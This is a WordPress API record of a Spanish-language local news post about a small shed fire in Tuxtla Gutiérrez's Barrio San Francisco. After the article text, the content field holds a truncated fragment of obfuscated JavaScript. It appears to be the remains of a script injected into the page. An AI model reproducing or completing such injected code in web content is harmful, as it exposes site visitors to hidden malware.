{"id":13127,"date":"2023-12-08T08:11:20","date_gmt":"2023-12-08T08:11:20","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=13127"},"modified":"2023-12-08T08:11:20","modified_gmt":"2023-12-08T08:11:20","slug":"se-registra-incendio-de-una-galera-en-el-barrio-san-francisco","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=13127","title":{"rendered":"Se registra incendio de una galera en el Barrio San Francisco"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/12\/FB_IMG_1702022991282-1024x768.jpg\" alt=\"\" class=\"wp-image-13128\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/12\/FB_IMG_1702022991282-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/12\/FB_IMG_1702022991282-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/12\/FB_IMG_1702022991282-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/12\/FB_IMG_1702022991282.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudano, 7 de diciembre del 2023. Tuxtla Guti\u00e9rrez. &#8211; Este jueves se registr\u00f3 un incendio en una galera de madera y l\u00e1minas dentro de un domicilio ubicado en la 18 Sur, entre Calle Central y 1a Poniente del Barrio San Francisco de Tuxtla Guti\u00e9rrez.Fueron los mismos habitantes de la casa quienes observaron que sal\u00eda humo del patio trasero y la galera se incendiaba.Afortunadamente, con ayuda de los vecinos apagaron el fuego antes de que se expandiera  a otra parte.Al lugar arribaron elementos de la polic\u00eda y al descartar una incidencia mayor, no pidieron la presencia de los bomberos.Como da\u00f1os materiales, se quem\u00f3 la galera de unos seis metros cuadrados, con ropa, madera ropa y trastes.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudano, 7 de diciembre del 2023. Tuxtla Guti\u00e9rrez. &#8211; Este jueves se registr\u00f3 un incendio en una galera de madera y l\u00e1minas dentro de un domicilio ubicado en la 18 Sur, entre Calle Central y 1a Poniente del Barrio San Francisco de Tuxtla Guti\u00e9rrez.Fueron los mismos habitantes de la casa quienes observaron que &hellip;<\/p>\n","protected":false},"author":2,"featured_media":13128,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-13127","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13127","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13127"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13127\/revisions"}],"predecessor-version":[{"id":13129,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13127\/revisions\/13129"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/13128"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13127"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13127"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13127"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}